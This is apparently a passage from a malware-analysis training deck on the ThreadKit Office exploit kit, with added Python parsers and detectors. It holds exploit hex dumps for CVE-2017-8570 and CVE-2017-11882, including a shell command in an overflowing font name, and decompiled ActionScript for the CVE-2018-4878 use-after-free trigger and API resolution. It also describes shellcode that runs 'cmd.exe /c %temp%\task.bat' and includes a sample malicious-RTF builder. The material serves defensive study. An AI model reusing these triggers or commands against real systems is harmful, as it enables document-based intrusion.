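    for _ in range(3):
        (n,) = struct.unpack_from("<I", native, off)
        off += 4
        unicode_strings.append(native[off:off + 2 * n].decode("utf-16-le"))
        off += 2 * n
    return {"header": header, "label": label, "orig_path": orig_path, "drop_path": drop_path,
            "file_data": file_data, "unicode_strings": unicode_strings}


def build_sample_rtf() -> str:
    """Constructed sample: a Package object wrapping a benign two-line batch file."""
    bat = b"@ECHO OFF\r\nECHO sample\r\n"
    path, label = b"C:\\Intel\\note.bat", b"note.bat"
    pkg = (struct.pack("<H", 2) + label + b"\x00" + path + b"\x00" + b"\x00\x00\x03\x00"
           + struct.pack("<I", len(path) + 1) + path + b"\x00"
           + struct.pack("<I", len(bat)) + bat)
    for s in (path, label, path):
        pkg += struct.pack("<I", len(s)) + s.decode().encode("utf-16-le")
    obj = (struct.pack("<II", 0x00000501, 2)              # OLEVersion, FormatID
           + struct.pack("<I", 8) + b"Package\x00"        # ClassName
           + struct.pack("<II", 0, 0)                     # empty TopicName and ItemName
           + struct.pack("<I", len(pkg)) + pkg)           # NativeDataSize, NativeData
    hexrun = obj.hex()
    wrapped = "\n".join(hexrun[i:i + 64] for i in range(0, len(hexrun), 64))
    return "{\\rtf1{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata\n" + wrapped + "}}}"


def analyse(rtf: str) -> dict:
    """What triage needs from a suspicious RTF: the object class and the dropped file."""
    obj = parse_ole1_object(extract_objdata_hex(rtf))
    pkg = parse_package(obj["native_data"]) if obj["class_name"] == "Package" else None
    return {"class_name": obj["class_name"], "package": pkg}
```

Running analyse(build_sample_rtf()) returns the class name "Package" together with the label, both paths and the raw batch file, which is exactly the information the dump on slide 12 is annotated with. On a real ThreadKit sample the same walk surfaces the task.bat script without opening the document.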
  • 13. COMPOUND MONIKER LOGIC EXPLOIT
    § CVE-2017-8570 is a logic vulnerability in Microsoft Office
    § Allows execution of a local scriptlet file using a StdOleLink class object
    § Scriptlet is a Package object written to %TEMP% when the document is opened
    § Composite moniker
      § File Moniker references the scriptlet
      § New Moniker
    § Placing logic exploits first in the load order means nothing crashes and the remaining exploit objects are still loaded
  • 14. COMPOSITE MONIKER OLE OBJECT
    00000000  01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00  ................
    00000010  00 00 00 00 00 00 00 00 C0 00 00 00 09 03 00 00  ................
    00000020  00 00 00 00 C0 00 00 00 00 00 00 46 02 00 00 00  ...........F....
    00000030  03 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46  ...............F
    00000040  00 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000060  0E 00 AD DE 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000070  00 00 00 00 00 00 00 00 38 00 00 00 32 00 00 00  ........8...2...
    00000080  03 00 25 00 74 00 4D 00 70 00 25 00 5C 00 69 00  ..%.t.M.p.%.\.i.
    00000090  6E 00 74 00 65 00 6C 00 64 00 72 00 69 00 76 00  n.t.e.l.d.r.i.v.
    000000A0  65 00 72 00 75 00 70 00 64 00 31 00 2E 00 73 00  e.r.u.p.d.1...s.
    000000B0  63 00 74 00 C6 AF AB EC 19 7F D2 11 97 8E 00 00  c.t.............
    000000C0  F8 75 7E 2A 00 00 00 00 00 00 00 00 00 00 00 00  .u~*............
    000000D0  00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF  ................
    000000E0  06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46  ...............F
    000000F0  00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00  ................
    Annotated fields:
    § CLSID identifying composite moniker (offset 0x1C: 00000309-0000-0000-C000-000000000046)
    § CLSID identifying file moniker (offset 0x30: 00000303-0000-0000-C000-000000000046)
    § CLSID identifying new moniker (offset 0xB4: ECABAFC6-7F19-11D2-978E-0000F8757E2A)
    § Path to scriptlet to execute (UTF-16 string at offset 0x82: %tMp%\inteldriverupd1.sct)
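Slides 13 and 14 explain the composite moniker chain by pointing at CLSIDs and a path in a dump. The script below, an added example that is not code from the slides or from CrowdStrike, parses that chain: it reads the composite moniker's count, walks each part by CLSID, decodes the FileMoniker body (cAnti, ansiPath, endServer, versionNumber 0xDEAD, reserved area, UTF-16 path) according to MS-OLEDS, and flags the FileMoniker followed by NewMoniker pairing that slide 13 describes. Its input is the moniker portion of the slide 14 dump (file offsets 0x1C to 0xC3), transcribed from the slide; the URL moniker CLSID is recognised but its body is not parsed, which is an assumption of scope, not of the format.

```python
"""Walk a composite moniker stream and report what it is made of.

Added example (not from the slides): FileMoniker layout per MS-OLEDS, sample
bytes transcribed from the slide 14 dump (offsets 0x1C..0xC3).
"""
import struct
import uuid

# Well-known moniker class identifiers from the COM SDK headers.
CLSID_COMPOSITE_MONIKER = uuid.UUID("00000309-0000-0000-c000-000000000046")
CLSID_FILE_MONIKER = uuid.UUID("00000303-0000-0000-c000-000000000046")
CLSID_NEW_MONIKER = uuid.UUID("ecabafc6-7f19-11d2-978e-0000f8757e2a")
CLSID_URL_MONIKER = uuid.UUID("79eac9e0-baf9-11ce-8c82-00aa004ba90b")

# Slide 14 dump, bytes 0x1C..0xC3: composite -> file moniker -> new moniker.
SLIDE14_MONIKER = bytes.fromhex(
    "0903000000000000c000000000000046"    # 0x1C  CLSID_CompositeMoniker
    + "02000000"                          # 0x2C  number of monikers
    + "0303000000000000c000000000000046"  # 0x30  CLSID_FileMoniker
    + "0000" + "1a000000" + "00" * 26     # 0x40  cAnti, ansiLength, empty ansiPath
    + "0e00" + "adde" + "00" * 20         # 0x60  endServer, versionNumber 0xDEAD, reserved
    + "38000000" + "32000000" + "0300"    # 0x78  cbUnicodePathSize, cbUnicodePathBytes, usKeyValue
    + "%tMp%\\inteldriverupd1.sct".encode("utf-16-le").hex()  # 0x82 unicodePath
    + "c6afabec197fd211978e0000f8757e2a"  # 0xB4  CLSID_NewMoniker
)


def _clsid(buf: bytes, off: int):
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def parse_file_moniker(buf: bytes, off: int):
    """FileMoniker body (the part after its CLSID) -> (info, next offset)."""
    c_anti, ansi_len = struct.unpack_from("<HI", buf, off)
    off += 6
    ansi_path = buf[off:off + ansi_len].rstrip(b"\x00").decode("latin-1")
    off += ansi_len
    end_server, version = struct.unpack_from("<HH", buf, off)
    off += 4 + 20                                   # endServer, versionNumber, reserved[20]
    (unicode_size,) = struct.unpack_from("<I", buf, off)
    off += 4
    unicode_path = ""
    if unicode_size:                                # unicode block only present when non-zero
        path_bytes, key = struct.unpack_from("<IH", buf, off)
        off += 6
        unicode_path = buf[off:off + path_bytes].decode("utf-16-le")
        off += path_bytes
    return {"type": "FileMoniker", "c_anti": c_anti, "version": version,
            "end_server": end_server, "path": unicode_path or ansi_path}, off


def parse_moniker(buf: bytes, off: int = 0):
    """Parse the moniker whose CLSID starts at off -> (description, next offset)."""
    clsid, off = _clsid(buf, off)
    if clsid == CLSID_COMPOSITE_MONIKER:
        (count,) = struct.unpack_from("<I", buf, off)
        off += 4
        parts = []
        for _ in range(count):
            part, off = parse_moniker(buf, off)
            parts.append(part)
            if not part.get("parsed", True):        # unknown body: cannot walk further
                break
        return {"type": "CompositeMoniker", "parts": parts}, off
    if clsid == CLSID_FILE_MONIKER:
        return parse_file_moniker(buf, off)
    if clsid == CLSID_NEW_MONIKER:
        return {"type": "NewMoniker"}, off          # carries no body
    name = "URLMoniker" if clsid == CLSID_URL_MONIKER else f"Unknown({clsid})"
    return {"type": name, "parsed": False}, off     # body layout not handled here


def scriptlet_via_composite(moniker: dict) -> bool:
    """Slide 13 pattern: a composite holding a FileMoniker directly followed by a NewMoniker."""
    if moniker.get("type") != "CompositeMoniker":
        return False
    kinds = [p["type"] for p in moniker["parts"]]
    return any(kinds[i:i + 2] == ["FileMoniker", "NewMoniker"] for i in range(len(kinds) - 1))


def scan_for_composite(blob: bytes) -> list:
    """Locate composite monikers anywhere in an object stream and parse each one."""
    needle = CLSID_COMPOSITE_MONIKER.bytes_le
    found, start = [], blob.find(needle)
    while start != -1:
        try:
            moniker, _ = parse_moniker(blob, start)
            found.append(moniker)
        except (struct.error, UnicodeDecodeError, ValueError):
            pass                                    # truncated or not really a moniker
        start = blob.find(needle, start + 1)
    return found
```

Applied to the slide 14 bytes, parse_moniker() returns a CompositeMoniker whose parts are a FileMoniker with path %tMp%\inteldriverupd1.sct and a NewMoniker, and scriptlet_via_composite() reports the pairing. scan_for_composite() is the form to run over a whole extracted \objdata blob, since the composite CLSID does not sit at a fixed offset in every sample.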
  • 15. Hands-On Exercise: STATICALLY ANALYZE THREADKIT COMPOSITE MONIKER EXPLOIT INFECTION CHAIN
  • 16. EQUATION EDITOR BUFFER OVERFLOW EXPLOITS
    § CVE-2017-11882 and CVE-2018-0802
    § Creating Application is Microsoft Equation Editor (EQNEDT32.EXE)
    § Launched by the DCOM Server Process Launcher as a Distributed Component Object Model (DCOM) server
    § Microsoft Word acts as the client, passing binary equation messages to the server for processing
    § DCOM server crashes do not affect loading of the remaining exploits
  • 17. FONT RECORD BUFFER OVERFLOW
    § CVE-2017-11882
    § Unprotected strcpy into a stack buffer with user-controlled data
    § MTEF Font record
    § No DEP, ASLR or stack cookies results in a vanilla buffer overflow
    § Overwrite return address with a call to WinExec with the supplied string argument as Font name to execute the Package object from %TEMP%
  • 18. FONT RECORD BUFFER OVERFLOW
    00000ca0: 0000 0800 0043 6d44 202f 6320 436d 4420  .....CmD /c CmD 
    00000cb0: 3c20 2225 746d 5025 5c61 6161 6161 6161  < "%tmP%\aaaaaaa
    00000cc0: 6161 612e 7478 7422 2026 2065 7869 7420  aaa.txt" & exit 
    00000cd0: 2012 0c63 0044 0002 8165 0002 8166 0000   ..c.D...e...f..
    Annotated fields:
    § Font record (tag 0x08 at offset 0xCA2)
    § Name field (from offset 0xCA5)
    § WinExec return address (following the Name field)
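Slides 17 and 18 show why the font name is the field to watch: the MTEF FONT record is copied with strcpy into a fixed stack buffer. The scanner below is an added example, not code from the slides or from CrowdStrike, and it is a heuristic rather than a full MTEF parser: it looks for the record shape on slide 18 (tag 0x08, typeface byte, style byte, NUL-terminated name) and reports any name that could not be a real typeface name, because it is long, contains non-printable bytes or reads like a shell command. The input is the 64-byte fragment printed on slide 18; the length threshold MAX_SANE_NAME is an assumption chosen conservatively, since the slides do not state the size of the stack buffer in EQNEDT32.EXE.

```python
"""Heuristic scan of Equation Editor (MTEF) bytes for oversized FONT records.

Added example (not from the slides). Not a full MTEF parser: it searches for the
FONT record shape shown on slide 18 and judges the name field. The threshold is
an assumption; the fragment is the one printed on slide 18.
"""

FONT_RECORD_TAG = 0x08
MAX_SANE_NAME = 32                       # assumption: real typeface names are short
SHELL_MARKERS = ("cmd", "%", "&", "exit")  # strings seen in the slide 18 name field

# Bytes 0x0CA0..0x0CDF of the slide 18 dump.
SLIDE18_FRAGMENT = bytes.fromhex(
    "0000080000436d44" "202f6320436d4420"
    "3c202225746d5025" "5c61616161616161"
    "6161612e74787422" "2026206578697420"
    "20120c6300440002" "8165000281660000"
)


def scan_font_records(mtef: bytes) -> list:
    """Return one finding per candidate FONT record found in the byte string."""
    findings = []
    pos = mtef.find(bytes([FONT_RECORD_TAG]))
    while pos != -1:
        name_start = pos + 3                          # tag, tface, style, then the name
        if name_start > len(mtef):
            break
        end = mtef.find(b"\x00", name_start)
        stop = end if end != -1 else len(mtef)        # unterminated name runs to the end
        name = mtef[name_start:stop]
        text = name.decode("latin-1")
        reasons = []
        if len(name) > MAX_SANE_NAME:
            reasons.append(f"name is {len(name)} bytes (> {MAX_SANE_NAME})")
        if any(b < 0x20 or b > 0x7E for b in name):
            reasons.append("name contains non-printable bytes")
        if any(marker in text.lower() for marker in SHELL_MARKERS):
            reasons.append("name looks like a shell command")
        findings.append({
            "offset": pos,
            "tface": mtef[pos + 1] if pos + 1 < len(mtef) else None,
            "style": mtef[pos + 2] if pos + 2 < len(mtef) else None,
            "name_length": len(name),
            "name": text,
            # last bytes of the name including its terminator: on slide 18 this is
            # where the return address sits at the end of the overflowing string
            "tail_hex": mtef[max(name_start, stop - 3):stop + 1].hex(),
            "suspicious": bool(reasons),
            "reasons": reasons,
        })
        pos = mtef.find(bytes([FONT_RECORD_TAG]), pos + 1)
    return findings


def looks_exploited(mtef: bytes) -> bool:
    """Triage verdict: any FONT record that fails the sanity checks."""
    return any(f["suspicious"] for f in scan_font_records(mtef))
```

On the slide 18 fragment the scanner finds one record at offset 2 whose name runs for 47 bytes, contains the 0x12 and 0x0C bytes and starts with CmD /c, so all three checks fire; a record carrying a plain name such as Symbol passes. In a real tool the record walk should follow the MTEF grammar from the Equation Native stream header rather than searching for the tag byte, otherwise a 0x08 inside other record data produces a false candidate.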
  • 19. Hands-On Exercise: DYNAMICALLY ANALYZE EQNEDT32.EXE EXPLOITATION INFECTION CHAIN
  • 20. Hands-On Exercise: STATICALLY ANALYZE EQNEDT32.EXE TO IDENTIFY CVE-2017-11882
  • 21. Hands-On Exercise: DYNAMICALLY ANALYZE EQNEDT32.EXE CVE-2017-11882 EXPLOITATION
  • 22. ADOBE FLASH UAF
    § CVE-2018-4878
    § Flash embedded OLE CLSID causes the ActiveX control DLL to be loaded into Word
    § DLL processes the embedded Shockwave Flash (SWF) object
    § No sandboxing (such as in a browser environment)
    § Use After Free may result in a crash in Word, but it’s the last exploit to be attempted
  • 23. Hands-On Exercise: STATICALLY ANALYZE ACTIONSCRIPT TO IDENTIFY UAF TRIGGER
  • 24. ADOBE FLASH UAF – UAF TRIGGER
    public function MainExp()
    {
        this.shellcodBytes = MainExp_shellcodBytes;
        super();
        data14 = new this.shellcodBytes() as ByteArray;
        data14.endian = Endian.LITTLE_ENDIAN;
        setTimeout(this.startexp,10);
    }
    public function startexp() : void
    {
        this.var_3 = new UAFGenerator(this);
    }
  • 25. ADOBE FLASH UAF – UAF TRIGGER
    public function UAFGenerator(param1:MainExp)
    {
        this.method_2();
        try
        {
            new LocalConnection().connect("foo");
            new LocalConnection().connect("foo");
        }
        catch(e:Error)
        {
            this.var_13 = new DRM_obj();
        }
        this.var_14 = new Timer(100,1000);
        this.var_14.addEventListener("timer",this.method_1);
        this.var_14.start();
    }
  • 26. ADOBE FLASH UAF - UAF TRIGGER
    public function method_2() : void
    {
        var _loc1_:PSDK = PSDK.pSDK;
        var _loc2_:PSDKEventDispatcher = _loc1_.createDispatcher();
        this.var_15 = _loc1_.createMediaPlayer(_loc2_);
        this.var_16 = new DRM_obj();
        this.var_15.drmManager.initialize(this.var_16);
        this.var_16 = null;
    }
  • 27. ADOBE FLASH UAF - UAF TRIGGER
    public function method_1(param1:TimerEvent) : void
    {
        if(this.var_13.a1 != 4369)
        {
            this.var_14.stop();
            this.flash25();
        }
    }
  • 28. ADOBE FLASH UAF – DLL MEMORY SEARCH
    public static var flash72:Boolean = Capabilities.version.toUpperCase().search("WIN") >= 0;
    while(var_12 < size)
    {
        flash21.position = b + flash32(b0 + var_12);
        if(flash21.readUTFBytes(12).toLowerCase() == "kernel32.dll")
        {
            oft = flash32(b0 + var_12 - 3 * 4);
            ft = flash32(b0 + var_12 + 4);
            break;
        }
        var_12 = var_12 + 5 * 4;
    }
  • 29. ADOBE FLASH UAF – GADGET RESOLUTION
    -snip-
    if(flash21.readUTF().toLowerCase() == "virtualprotect")
    {
        gadget3 = flash32(b + ft + var_12 * 4);
        c++;
    -snip-
    else
    {
        flash21.position = b + b0;
        if(flash21.readUTF().toLowerCase() == "createprocessa")
        {
            CreateProcessFunc = flash32(b + ft + var_12 * 4);
            c++;
    -snip-
  • 30. Hands-On Exercise: STATICALLY ANALYZE ACTIONSCRIPT TO EXTRACT AND ANALYZE SHELLCODE
  • 31. ADOBE FLASH UAF - SHELLCODE
    § Shellcode walks the InMemoryOrderModuleList
    § Hashes each module name to find kernel32.dll with the hash 0x6A4ABC5B
    § Export table for kernel32.dll is searched for two hex values in memory, 0x50746547 meaning “PteG” and 0x41636F72 meaning “Acor”, i.e. GetProcA, which is the substring used to identify the GetProcAddress function
    § 0x636578 (meaning “cex”) and 0x456E6957 (meaning “EniW”), i.e. WinExec
    § GetProcAddress to resolve the function address
    § WinExec is called to execute the following command:
      § cmd.exe /c %temp%\task.bat